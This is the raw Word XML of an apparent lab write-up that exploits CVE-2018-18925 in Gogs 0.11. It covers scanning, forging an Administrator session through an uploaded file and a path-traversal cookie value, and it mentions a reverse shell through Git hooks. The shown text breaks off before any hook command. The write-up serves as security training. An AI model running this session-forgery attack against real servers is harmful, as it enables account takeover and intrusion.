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99z6mzhwdyo"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2jdf36ck1i0p"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jc w:val="cente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0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Like</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you need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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qxin4899h8iy" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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began enumeration of the machine using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9">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0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&lt;machine-ip&gt;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-vvv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="157"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943600" cy="1562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application via port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified that it was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gogs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">self-hosted open-source Git </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:jc w:val="both"/>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84813"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="159"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943600" cy="35848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performed directory and file brute forcing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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ffuf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http://&lt;machine-ip&gt;/FUZZ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big.txt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-recursion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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41863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="158"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943600" cy="28418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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> route allowed identification of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="161"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600" cy="3060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At the bottom of the webpage, we also observed the application version and programming language: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gogs Version 0.11 – Go 1.11.</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14500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="160"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943600" cy="171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checking the application version, we identified that it is affected by </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2018-18925</w:t>
        </w:r>
      </w:hyperlink>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To reproduce the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is necessary to register in the application and then log in. This vulnerability consists of a session </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass through the injection of a malicious file into the application.</w:t>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01349"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="164"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943600" cy="330134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registered a new user in the application.</w:t>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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="163"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943600" cy="2882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created a new repository within the application.</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="169"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5943600" cy="2171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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="167"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943600" cy="2565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proceed, it was necessary to clone the repository created in the application via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git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http://&lt;machine-ip&gt;/teste/respository</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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173"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also cloned the public repository containing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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https://github.com/j4k0m/CVE-2018-18925</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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24000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="170"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943600" cy="1524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Before compiling the binary, it was necessary to define which user would be targeted by the session bypass.</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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="172"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943600" cy="1562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compiled the binary generated from the Go source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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main.go.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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749300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="174" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="749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moved the compiled binary to the directory of the Git repository cloned earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv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../repository</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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6400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="175" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="406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configured Git properly to allow adding the malicious file to the repository and pushing it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git push</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C">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"teste"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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--global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"teste@teste.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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"pwn"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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push</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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38500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="176"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5943600" cy="3238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file was added to the created repository.</w:t>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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="177"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5943600" cy="2679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performed the file upload again. </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creating a local copy of the repository, Gogs stores files at: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, this directory is created only when the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="178"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5943600" cy="2476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19500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="179"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5943600" cy="3619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we clicked the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fork</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> button to identify which repository contained the uploaded file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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63800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="180"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5943600" cy="2463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76600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="181" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3276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identified that the directory corresponds to repository number </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the URI. From this point forward, it was only necessary to modify the content of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i_like_gogits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie to reference the fake session created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">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6">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i_like_gogits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../tmp/local-repo/2/payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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66800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="146"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1066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reloading the application, we obtained access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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24100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="147"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2324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gaining access to the Administrator account, it was possible to execute commands through</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git hooks.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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94100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="148"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943600" cy="3594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allowed us to trigger our reverse shell through command execution via</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git hooks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7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overwrote the three Git hooks — </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
